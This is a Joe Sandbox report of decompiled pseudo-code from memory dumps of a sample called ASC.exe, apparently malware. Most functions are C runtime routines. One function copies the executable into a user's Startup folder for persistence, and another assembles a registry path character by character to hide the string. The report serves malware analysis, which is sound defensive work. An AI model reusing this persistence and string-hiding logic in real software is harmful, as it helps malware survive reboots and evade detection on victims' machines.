Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C79FA, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E012C79FA(void* __ecx, intOrPtr* __edx, void* __edi, signed int* _a4, signed int _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed int _t50;
				void* _t51;
				signed int _t53;
				void* _t54;
				void* _t56;
				signed int _t57;
				void* _t58;
				signed int* _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr* _t69;
				void* _t81;
				signed char _t83;
				void* _t86;
				void* _t91;
				intOrPtr* _t94;
				unsigned int _t96;
				intOrPtr* _t102;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t113;
				intOrPtr* _t114;
				void* _t119;

				_t105 = __edi;
				_t102 = __edx;
				if( *0x12e6b2c == 0) {
					_t50 = E012C2EFF(__ecx);
				}
				_t111 =  *0x12e3240; // 0x0
				_push(_t105);
				_t106 = 0;
				if(_t111 != 0) {
					while(1) {
						_t51 =  *_t111;
						if(_t51 == 0) {
							break;
						}
						if(_t51 != 0x3d) {
							_t106 = _t106 + 1;
						}
						_t111 = _t111 + E012C63C0(_t111) + 1;
					}
					_t50 = E012C8FD6(_t106 + 1, 4);
					_t108 = _t50;
					_pop(_t91);
					 *0x12e3260 = _t108;
					if(_t108 == 0) {
						goto L3;
					} else {
						_t113 =  *0x12e3240; // 0x0
						while( *_t113 != 0) {
							_t54 = E012C63C0(_t113);
							_pop(_t91);
							_t3 = _t54 + 1; // 0x1
							_t81 = _t3;
							if( *_t113 == 0x3d) {
								L14:
								_t113 = _t113 + _t81;
								continue;
							} else {
								_t56 = E012C8FD6(_t81, 1); // executed
								_pop(_t91);
								 *_t108 = _t56;
								if(_t56 == 0) {
									_t57 = E012C115B(_t91, _t102, _t113,  *0x12e3260);
									 *0x12e3260 =  *0x12e3260 & 0x00000000;
									_t53 = _t57 | 0xffffffff;
									L17:
									goto L18;
								} else {
									_t58 = E012C1CDF(_t56, _t81, _t113);
									_t119 = _t119 + 0xc;
									if(_t58 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E012C38BA(_t81, _t108, _t113);
										asm("int3");
										_push(_t91);
										_t94 = _v20;
										_push(_t81);
										_push(_t113);
										 *_t108 = 0;
										_t114 = _t102;
										_t103 = _v24;
										 *_t94 = 1;
										if(_v28 != 0) {
											_a4 =  &(_a4[1]);
											 *_a4 = _t103;
										}
										_v8 = 0;
										do {
											if( *_t114 != 0x22) {
												 *_t108 =  *_t108 + 1;
												if(_t103 != 0) {
													 *_t103 =  *_t114;
													_a8 = _t103 + 1;
												}
												_t83 =  *_t114;
												_t114 = _t114 + 1;
												if(E012CB01C(_t83 & 0x000000ff) != 0) {
													 *_t108 =  *_t108 + 1;
													if(_a8 != 0) {
														_a8 = _a8 + 1;
														 *_a8 =  *_t114;
													}
													_t114 = _t114 + 1;
												}
												_t103 = _a8;
												_t94 = _a12;
												if(_t83 == 0) {
													_t114 = _t114 - 1;
												} else {
													goto L33;
												}
											} else {
												_t83 = 0x22;
												_t114 = _t114 + 1;
												_v8 = 0 | _v8 == 0x00000000;
												goto L33;
											}
											L38:
											_v8 = _v8 & 0x00000000;
											L39:
											while( *_t114 != 0) {
												while(1) {
													_t65 =  *_t114;
													if(_t65 != 0x20 && _t65 != 9) {
														break;
													}
													_t114 = _t114 + 1;
												}
												if( *_t114 != 0) {
													if(_a4 != 0) {
														_a4 =  &(_a4[1]);
														 *_a4 = _t103;
													}
													 *_t94 =  *_t94 + 1;
													while(1) {
														_t86 = 1;
														_t96 = 0;
														L50:
														while( *_t114 == 0x5c) {
															_t114 = _t114 + 1;
															_t96 = _t96 + 1;
														}
														if( *_t114 == 0x22) {
															if((_t96 & 0x00000001) == 0) {
																if(_v8 == 0) {
																	L56:
																	_t86 = 0;
																	_v8 = 0 | _v8 == 0x00000000;
																} else {
																	_t69 = _t114 + 1;
																	if( *_t69 != 0x22) {
																		goto L56;
																	} else {
																		_t114 = _t69;
																	}
																}
															}
															_t96 = _t96 >> 1;
														}
														if(_t96 != 0) {
															do {
																_t96 = _t96 - 1;
																if(_t103 != 0) {
																	 *_t103 = 0x5c;
																	_t103 = _t103 + 1;
																}
																 *_t108 =  *_t108 + 1;
															} while (_t96 != 0);
															_a8 = _t103;
														}
														_t66 =  *_t114;
														if(_t66 != 0 && (_v8 != 0 || _t66 != 0x20 && _t66 != 9)) {
															if(_t86 != 0) {
																_push(_t66);
																if(_t103 == 0) {
																	if(E012CB01C() != 0) {
																		_t114 = _t114 + 1;
																		 *_t108 =  *_t108 + 1;
																	}
																} else {
																	if(E012CB01C() != 0) {
																		_a8 = _a8 + 1;
																		 *_a8 =  *_t114;
																		_t114 = _t114 + 1;
																		 *_t108 =  *_t108 + 1;
																	}
																	_a8 = _a8 + 1;
																	 *_a8 =  *_t114;
																}
																 *_t108 =  *_t108 + 1;
																_t103 = _a8;
															}
															_t114 = _t114 + 1;
															_t86 = 1;
															_t96 = 0;
															goto L50;
														}
														if(_t103 != 0) {
															 *_t103 = 0;
															_t103 = _t103 + 1;
															_a8 = _t103;
														}
														 *_t108 =  *_t108 + 1;
														_t94 = _a12;
														goto L39;
													}
												}
												break;
											}
											_t64 = _a4;
											if(_t64 != 0) {
												 *_t64 =  *_t64 & 0x00000000;
											}
											 *_t94 =  *_t94 + 1;
											return _t64;
											goto L82;
											L33:
										} while (_v8 != 0 || _t83 != 0x20 && _t83 != 9);
										if(_t103 != 0) {
											 *((char*)(_t103 - 1)) = 0;
										}
										goto L38;
									} else {
										_t108 = _t108 + 4;
										goto L14;
									}
								}
							}
							goto L82;
						}
						E012C115B(_t91, _t102, _t113,  *0x12e3240);
						 *0x12e3240 =  *0x12e3240 & 0x00000000;
						 *_t108 =  *_t108 & 0x00000000;
						 *0x12e6b20 = 1;
						_t53 = 0;
						goto L17;
					}
				} else {
					L3:
					_t53 = _t50 | 0xffffffff;
					L18:
					return _t53;
				}
				L82:
			}

0x012c79fa
0x012c79fa
0x012c7a01
0x012c7a03
0x012c7a03
0x012c7a09
0x012c7a0f
0x012c7a10
0x012c7a14
0x012c7a2e
0x012c7a2e
0x012c7a32
0x00000000
0x00000000
0x012c7a20
0x012c7a22
0x012c7a22
0x012c7a2a
0x012c7a2a
0x012c7a38
0x012c7a3d
0x012c7a40
0x012c7a41
0x012c7a49
0x00000000
0x012c7a4b
0x012c7a4b
0x012c7a87
0x012c7a55
0x012c7a5d
0x012c7a5e
0x012c7a5e
0x012c7a61
0x012c7a85
0x012c7a85
0x00000000
0x012c7a63
0x012c7a66
0x012c7a6c
0x012c7a6d
0x012c7a71
0x012c7ab8
0x012c7abd
0x012c7ac4
0x012c7aad
0x00000000
0x012c7a73
0x012c7a76
0x012c7a7b
0x012c7a80
0x012c7acb
0x012c7acc
0x012c7acd
0x012c7ace
0x012c7acf
0x012c7ad0
0x012c7ad5
0x012c7adb
0x012c7adc
0x012c7adf
0x012c7ae2
0x012c7ae3
0x012c7ae5
0x012c7ae7
0x012c7aea
0x012c7af3
0x012c7af8
0x012c7afc
0x012c7afc
0x012c7afe
0x012c7b01
0x012c7b04
0x012c7b16
0x012c7b1a
0x012c7b1e
0x012c7b21
0x012c7b21
0x012c7b24
0x012c7b2a
0x012c7b33
0x012c7b35
0x012c7b3b
0x012c7b42
0x012c7b45
0x012c7b45
0x012c7b47
0x012c7b47
0x012c7b48
0x012c7b4b
0x012c7b50
0x012c7b84
0x00000000
0x00000000
0x00000000
0x012c7b06
0x012c7b0b
0x012c7b10
0x012c7b11
0x00000000
0x012c7b11
0x012c7b6a
0x012c7b6a
0x00000000
0x012c7b6e
0x012c7b77
0x012c7b77
0x012c7b7b
0x00000000
0x00000000
0x012c7b81
0x012c7b81
0x012c7b8a
0x012c7b94
0x012c7b99
0x012c7b9d
0x012c7b9d
0x012c7b9f
0x012c7ba1
0x012c7ba3
0x012c7ba4
0x00000000
0x012c7baa
0x012c7ba8
0x012c7ba9
0x012c7ba9
0x012c7bb2
0x012c7bb7
0x012c7bbd
0x012c7bcb
0x012c7bcd
0x012c7bd5
0x012c7bbf
0x012c7bbf
0x012c7bc5
0x00000000
0x012c7bc7
0x012c7bc7
0x012c7bc7
0x012c7bc5
0x012c7bbd
0x012c7bd8
0x012c7bd8
0x012c7bdc
0x012c7bde
0x012c7bde
0x012c7be1
0x012c7be3
0x012c7be6
0x012c7be6
0x012c7be7
0x012c7be9
0x012c7bed
0x012c7bed
0x012c7bf0
0x012c7bf4
0x012c7c06
0x012c7c0b
0x012c7c0e
0x012c7c3b
0x012c7c3d
0x012c7c3e
0x012c7c3e
0x012c7c10
0x012c7c18
0x012c7c1f
0x012c7c22
0x012c7c24
0x012c7c25
0x012c7c25
0x012c7c2c
0x012c7c2f
0x012c7c2f
0x012c7c40
0x012c7c42
0x012c7c42
0x012c7c45
0x012c7ba3
0x012c7ba4
0x00000000
0x012c7ba6
0x012c7c4d
0x012c7c4f
0x012c7c52
0x012c7c53
0x012c7c53
0x012c7c56
0x012c7c58
0x00000000
0x012c7c58
0x012c7ba1
0x00000000
0x012c7b8a
0x012c7c60
0x012c7c67
0x012c7c69
0x012c7c69
0x012c7c6c
0x012c7c6f
0x00000000
0x012c7b52
0x012c7b52
0x012c7b64
0x012c7b66
0x012c7b66
0x00000000
0x012c7a82
0x012c7a82
0x00000000
0x012c7a82
0x012c7a80
0x012c7a71
0x00000000
0x012c7a61
0x012c7a92
0x012c7a97
0x012c7a9e
0x012c7aa1
0x012c7aab
0x00000000
0x012c7aab
0x012c7a16
0x012c7a16
0x012c7a16
0x012c7aaf
0x012c7ab1
0x012c7ab1
0x00000000

APIs

_strlen.LIBCMT ref: 012C7A24

Part of subcall function 012C8FD6: Sleep.KERNEL32(00000000), ref: 012C8FFE

_strlen.LIBCMT ref: 012C7A55

Part of subcall function 012CB01C: x_ismbbtype_l.LIBCMT ref: 012CB02A

Strings

, xrefs: 012C7B58

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D13C5, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108
thread

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E012D13C5(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* _t4;
				void* _t5;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr* _t16;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t34;
				void* _t37;
				signed int _t38;
				void* _t42;
				void* _t44;
				void* _t51;
				void* _t69;
				char** _t72;

				_t51 = __edx;
				_t37 = __ecx;
				_t4 = E012D0693(); // executed
				if(_t4 != 0) {
					_push(_t34);
					_push(_t34);
					_push(_t34);
					_push(E012CF8F4);
					_push(_t34);
					_push(_t34);
					return E012EBAA1(_t4, _t34, _t37);
				}
				_push(_t4);
				_t5 = E013790ED(_t34);
				__eflags = _t5 - 4;
				if(_t5 != 4) {
					_t38 = 8;
					memcpy(0x12e5914, 0x12e079c, _t38 << 2);
					memcpy(0x12e5934, 0x12e07c0, 0 << 2);
					_t42 = 8;
					_t65 = 0x12e07e4;
					memcpy(0x12e58f4, 0x12e07e4, 0 << 2);
					_t72 = _t69 + 0x24;
					E012CDDE1(0x12e4f18, 0x12e4f1c); // executed
					 *_t72 = L"C:\\Users\\angela\\AppData\\Roaming\\MICROS~1\\Windows\\STARTM~1\\Programs\\Startup";
					E012CFAC9(0, _t51, __eflags);
					 *_t72 = L"C:\\Users\\angela\\AppData\\Roaming\\MICROS~1\\Windows\\STARTM~1\\Programs\\Startup\\ASC.exe"; // executed
					E012D01FD(__eflags); // executed
					 *_t72 = L"C:\\Users\\angela\\AppData\\Roaming\\MICROS~1\\Windows\\STARTM~1\\Programs\\Startup\\ASC.exe";
					E012CFB12(0x12e4f18, _t51, 0x12e07e4 + _t42 + _t42, 0x12e07e4, __eflags);
					_t44 = 8; // executed
					_t13 = E012CF5AF(0x12e4f18, 0x12e07e4 + _t42 + _t42, 0x12e07e4); // executed
					__eflags = _t13;
					if(__eflags == 0) {
						L10:
						_t14 = E012D0340(_t65, __eflags);
						__eflags = _t14;
						if(_t14 != 0) {
							goto L8;
						} else {
							_t65 = 0x1388;
							_push(0x1388);
							E012CD184();
							_t19 = E012D0383(0x1388, __eflags);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L8;
							} else {
								_push(0x1388);
								E012CD184();
								_t21 = E012D524E(0x12e4f18);
								__eflags = _t21;
								if(_t21 != 0) {
									__eflags =  *0x12e59a4; // 0x0
									if(__eflags == 0) {
										E012D106C(_t51, __eflags, 0x12e4f18);
										 *_t72 = 0x7d0;
										E012CD184();
										E012D0BBC(0x12e4f18);
									}
									E01317EBD(_t65);
									 *_t65( *0x12e59b0, 0x400, 0, 0, E012CF5EF(0x12e4f18, 0, _t65));
									 *_t65( *0x12e59b0, 0x405, 0, 0);
								}
							}
						}
					} else {
						_t30 = E012D02B6(0x12e4f18, __eflags);
						__eflags = _t30;
						if(_t30 != 0) {
							_push(0);
							E012D03C5(0x12e4f18, _t44, _t51, 0, 0x12e07e4);
						}
						L8:
						__eflags =  *0x12e59a4; // 0x0
						if(__eflags != 0) {
							_t16 =  *0x12e4f14; // 0x0
							_push(0);
							 *_t16 = 1;
							RtlExitUserThread();
							goto L10;
						}
					}
					__eflags = 0;
					return 0;
				} else {
					_push(_t34);
					return E0137270E(_t5, _t37);
				}
				goto L17;
			}

0x012d13c5
0x012d13c5
0x012d13c5
0x012d13cc
0x012d13ce
0x012d13cf
0x012d13d0
0x012d13d1
0x012d13d6
0x012d13d7
0x00000000
0x012d13d8
0x012d13ec
0x012d13ed
0x012d13f2
0x012d13f5
0x012d1400
0x012d140d
0x012d141a
0x012d141e
0x012d141f
0x012d1433
0x012d1433
0x012d1435
0x012d143a
0x012d1441
0x012d1446
0x012d144d
0x012d1452
0x012d1459
0x012d145e
0x012d145f
0x012d1466
0x012d1468
0x012d149a
0x012d149a
0x012d149f
0x012d14a1
0x00000000
0x012d14a3
0x012d14a3
0x012d14a8
0x012d14a9
0x012d14af
0x012d14b4
0x012d14b6
0x00000000
0x012d14b8
0x012d14b8
0x012d14b9
0x012d14c0
0x012d14c6
0x012d14c8
0x012d14ca
0x012d14d0
0x012d14d3
0x012d14d8
0x012d14df
0x012d14e6
0x012d14eb
0x012d14f2
0x012d1504
0x012d1513
0x012d1513
0x012d14c8
0x012d14b6
0x012d146a
0x012d146c
0x012d1471
0x012d1473
0x012d1475
0x012d1476
0x012d147b
0x012d147c
0x012d147c
0x012d1482
0x012d1488
0x012d148d
0x012d148e
0x012d1494
0x00000000
0x012d1494
0x012d1482
0x012d1517
0x012d151d
0x012d13f7
0x012d13f7
0x012d13fd
0x012d13fd
0x00000000

APIs

Part of subcall function 012D0340: CloseHandle.KERNEL32(00000000), ref: 012D0377

RtlExitUserThread.NTDLL(00000000,00000000), ref: 012D1494

Part of subcall function 012CD184: CloseHandle.KERNEL32(00000000), ref: 012CD1A0

Part of subcall function 012D03C5: CloseHandle.KERNEL32(?), ref: 012D0452

Strings

C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe, xrefs: 012D1446

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C1A39, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012C1A39(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v24;
				signed int _v28;
				void _v32;
				signed int _v36;
				void* __edi;
				signed int _t25;
				signed int _t34;
				void _t36;
				void* _t39;
				signed int _t42;
				signed int _t44;

				_v36 = _v36 & 0x00000000;
				_t34 = 7;
				if(_a12 != memset( &_v32, 0, _t34 << 2)) {
					_t36 = _a8;
					_t44 = _a4;
					if(_t36 == 0 || _t44 != 0) {
						_v32 = 0x7fffffff;
						if(_t36 <= 0x7fffffff) {
							_v32 = _t36;
						}
						_v24 = 0x42;
						_v28 = _t44;
						_v36 = _t44;
						_t25 = E012C54D3(_t39,  &_v36, _a12, _a16, _a20); // executed
						_t42 = _t25;
						if(_t44 != 0) {
							_t17 =  &_v32;
							 *_t17 = _v32 - 1;
							if( *_t17 < 0) {
								E012C391C(_t39, _t42, 0,  &_v36);
							} else {
								 *_v36 = 0;
							}
							_t25 = _t42;
						}
					} else {
						 *((intOrPtr*)(E012C22A2())) = 0x16;
						_t25 = E012C390C() | 0xffffffff;
					}
					return _t25;
				}
				 *((intOrPtr*)(E012C22A2())) = 0x16;
				return E012C390C() | 0xffffffff;
			}

0x012c1a41
0x012c1a4a
0x012c1a53
0x012c1a6a
0x012c1a6e
0x012c1a73
0x012c1a93
0x012c1a98
0x012c1a9a
0x012c1a9a
0x012c1aa6
0x012c1ab0
0x012c1ab4
0x012c1ab7
0x012c1abf
0x012c1ac3
0x012c1ac5
0x012c1ac5
0x012c1ac8
0x012c1ad8
0x012c1aca
0x012c1acd
0x012c1acd
0x012c1adf
0x012c1adf
0x012c1a79
0x012c1a7e
0x012c1a89
0x012c1a89
0x00000000
0x012c1ae1
0x012c1a5a
0x00000000

APIs

__output_l.LIBCMT ref: 012C1AB7

Part of subcall function 012C54D3: __isleadbyte_l.LIBCMT ref: 012C5866
Part of subcall function 012C54D3: _strlen.LIBCMT ref: 012C5A66
Part of subcall function 012C54D3: __aulldvrm.INT64 ref: 012C5DEA
Part of subcall function 012C54D3: _write_string.LIBCMT ref: 012C5F3A
Part of subcall function 012C54D3: _write_string.LIBCMT ref: 012C5FE1
Part of subcall function 012C54D3: _write_string.LIBCMT ref: 012C600F

Part of subcall function 012C391C: __getbuf.LIBCMT ref: 012C39BB

Strings

B, xrefs: 012C1AA6

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012CF9B1, Relevance: 3.0, APIs: 2, Instructions: 34windowsleep

APIs

SendMessageW.USER32(0000004A,00000000,?), ref: 012CFA00
Sleep.KERNELBASE(00000000), ref: 012CFA03

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C8793, Relevance: 3.0, APIs: 2, Instructions: 17

C-Code - Quality: 16%

			E012C8793(void* __eax, void* __ebx, intOrPtr* __edi, intOrPtr* __esi) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr* _t10;
				intOrPtr _t15;

				_t10 = __edi;
				_t15 =  *__esi;
				E012F624A(__ebx, __esi); // executed
				_t5 =  *_t10(__eax,  *((intOrPtr*)(_t15 + 8))); // executed
				 *__esi = _t5;
				_t6 =  *_t10(__esi + 4); // executed
				 *0x12e6b24 = _t6;
				_t7 =  *((intOrPtr*)(_t15 + 8));
				return _t7;
			}

0x012c8793
0x012c8793
0x012c879a
0x012c879f
0x012c87a1
0x012c87a7
0x012c87a9
0x012c87ae
0x012c87b9

APIs

RtlEncodePointer.NTDLL(00000004,?,?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834,?,?,012C2402,012C802D), ref: 012C879F
RtlEncodePointer.NTDLL(-00000004,?,?,?,?,012C8808,?,012E0BC0,0000000C,012C8834,?,?,012C2402,012C802D), ref: 012C87A7

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C3268, Relevance: 2.5, APIs: 2, Instructions: 17

C-Code - Quality: 72%

			E012C3268(void* __ebx) {
				void* __esi;
				void* _t3;
				void* _t6;

				_t6 = TlsGetValue( *0x12e2908);
				_t7 = _t6;
				if(_t6 == 0) {
					_push( *0x12e38d8);
					_push(__ebx); // executed
					_t3 = L012E75C6(_t1, __ebx, _t6, _t7); // executed
					_t6 = _t3;
					TlsSetValue( *0x12e2908, _t6);
				}
				return _t6;
			}

0x012c3277
0x012c3279
0x012c327b
0x012c327d
0x012c3283
0x012c3284
0x012c3289
0x012c3292
0x012c3292
0x012c329b

APIs

TlsGetValue.KERNEL32 ref: 012C3271
TlsSetValue.KERNEL32(00000000), ref: 012C3292

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012CD4FA, Relevance: 1.6, APIs: 1, Instructions: 147
library

C-Code - Quality: 63%

			E012CD4FA(struct HINSTANCE__* __eax, void* __ebx, short __esi) {
				short _t58;
				short _t59;
				short _t60;
				short _t61;
				short _t62;
				short _t63;
				short _t64;
				short _t65;
				short _t66;
				short _t67;
				short _t69;
				short _t70;
				short _t71;
				short _t78;
				short _t80;
				short _t81;
				short _t82;
				short _t84;
				short _t85;
				short _t86;
				short _t88;
				short _t90;
				short _t91;
				short _t93;
				short _t94;
				short _t95;
				short _t98;
				short _t99;
				short _t100;
				short _t101;
				short _t103;
				short _t104;
				short _t105;
				short _t106;
				short _t109;
				void* _t112;

				GetProcAddress(__eax, ??); // executed
				_t58 = 0x53;
				 *((short*)(_t112 - 0x144)) = _t58;
				_t59 = 0x4f;
				 *((short*)(_t112 - 0x142)) = _t59;
				_t60 = 0x46;
				 *((short*)(_t112 - 0x140)) = _t60;
				_t61 = 0x54;
				 *((short*)(_t112 - 0x13e)) = _t61;
				_t62 = 0x57;
				 *((short*)(_t112 - 0x13c)) = _t62;
				_t63 = 0x41;
				 *((short*)(_t112 - 0x13a)) = _t63;
				_t64 = 0x52;
				 *((short*)(_t112 - 0x138)) = _t64;
				_t65 = 0x45;
				 *((short*)(_t112 - 0x136)) = _t65;
				_t66 = 0x5c;
				 *((short*)(_t112 - 0x134)) = _t66;
				_t78 = 0x4d;
				 *((short*)(_t112 - 0x132)) = _t78;
				 *((short*)(_t112 - 0x130)) = __esi;
				_t80 = 0x63;
				 *((short*)(_t112 - 0x12e)) = _t80;
				_t81 = 0x72;
				 *((short*)(_t112 - 0x12c)) = _t81;
				_t82 = 0x6f;
				 *((short*)(_t112 - 0x12a)) = _t82;
				_t91 = 0x73;
				 *((short*)(_t112 - 0x128)) = _t91;
				_t84 = 0x6f;
				 *((short*)(_t112 - 0x126)) = _t84;
				_t85 = 0x66;
				 *((short*)(_t112 - 0x124)) = _t85;
				_t86 = 0x74;
				 *((short*)(_t112 - 0x122)) = _t86;
				 *((short*)(_t112 - 0x120)) = _t66;
				_t88 = 0x57;
				 *((short*)(_t112 - 0x11e)) = _t88;
				 *((short*)(_t112 - 0x11c)) = __esi;
				_t90 = 0x6e;
				 *((short*)(_t112 - 0x11a)) = _t90;
				_t93 = 0x64;
				 *((short*)(_t112 - 0x118)) = _t93;
				_t94 = 0x6f;
				 *((short*)(_t112 - 0x116)) = _t94;
				_t95 = 0x77;
				 *((short*)(_t112 - 0x114)) = _t95;
				 *((short*)(_t112 - 0x112)) = _t91;
				 *((short*)(_t112 - 0x110)) = _t66;
				_t98 = 0x43;
				 *((short*)(_t112 - 0x10e)) = _t98;
				_t99 = 0x75;
				 *((short*)(_t112 - 0x10c)) = _t99;
				_t100 = 0x72;
				 *((short*)(_t112 - 0x10a)) = _t100;
				 *((short*)(_t112 - 0x108)) = _t100;
				_t101 = 0x65;
				 *((short*)(_t112 - 0x106)) = _t101;
				 *((short*)(_t112 - 0x104)) = _t90;
				_t103 = 0x74;
				 *((short*)(_t112 - 0x102)) = _t103;
				_t104 = 0x56;
				 *((short*)(_t112 - 0x100)) = _t104;
				_t105 = 0x65;
				 *((short*)(_t112 - 0xfe)) = _t105;
				_t106 = 0x72;
				 *((short*)(_t112 - 0xfc)) = _t106;
				 *((short*)(_t112 - 0xfa)) = _t91;
				 *((short*)(_t112 - 0xf8)) = __esi;
				_t109 = 0x6f;
				 *((short*)(_t112 - 0xf2)) = _t66;
				_t67 = 0x55;
				 *((short*)(_t112 - 0xf6)) = _t109;
				 *((short*)(_t112 - 0xf0)) = _t67;
				 *((short*)(_t112 - 0xf4)) = _t90;
				 *((short*)(_t112 - 0xee)) = _t90;
				 *((short*)(_t112 - 0xec)) = __esi;
				 *((short*)(_t112 - 0xea)) = _t90;
				 *((short*)(_t112 - 0xe8)) = _t91;
				_t69 = 0x74;
				 *((short*)(_t112 - 0xe6)) = _t69;
				_t70 = 0x61;
				 *((short*)(_t112 - 0xe4)) = _t70;
				_t71 = 0x6c;
				 *((short*)(_t112 - 0xe2)) = _t71;
				 *((short*)(_t112 - 0xe0)) = _t71;
				 *((short*)(_t112 - 0xde)) = 0;
				_push(_t112 - 0x2c);
				_push( *((intOrPtr*)(_t112 - 0x28)));
				_push(_t112 - 0x144);
				_push(0x80000002);
				return E013784D3(_t112 - 0x144, _t91);
			}

0x012cd4fb
0x012cd503
0x012cd506
0x012cd50d
0x012cd510
0x012cd517
0x012cd51a
0x012cd521
0x012cd524
0x012cd52b
0x012cd52e
0x012cd535
0x012cd538
0x012cd53f
0x012cd542
0x012cd549
0x012cd54c
0x012cd553
0x012cd558
0x012cd55f
0x012cd560
0x012cd56b
0x012cd572
0x012cd575
0x012cd57c
0x012cd57f
0x012cd586
0x012cd587
0x012cd590
0x012cd595
0x012cd59c
0x012cd59f
0x012cd5a6
0x012cd5a9
0x012cd5b0
0x012cd5b3
0x012cd5bc
0x012cd5c3
0x012cd5c6
0x012cd5cf
0x012cd5d6
0x012cd5db
0x012cd5e2
0x012cd5e5
0x012cd5ec
0x012cd5ef
0x012cd5f6
0x012cd5f7
0x012cd602
0x012cd60b
0x012cd612
0x012cd615
0x012cd61c
0x012cd61f
0x012cd626
0x012cd629
0x012cd630
0x012cd637
0x012cd638
0x012cd643
0x012cd64a
0x012cd64d
0x012cd654
0x012cd657
0x012cd65e
0x012cd661
0x012cd668
0x012cd669
0x012cd672
0x012cd67d
0x012cd684
0x012cd685
0x012cd68e
0x012cd68f
0x012cd696
0x012cd6a1
0x012cd6a8
0x012cd6af
0x012cd6b6
0x012cd6bd
0x012cd6c6
0x012cd6c9
0x012cd6d0
0x012cd6d3
0x012cd6da
0x012cd6db
0x012cd6e2
0x012cd6eb
0x012cd6f5
0x012cd6f6
0x012cd700
0x012cd701
0x012cd70b

APIs

GetProcAddress.KERNEL32 ref: 012CD4FB

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

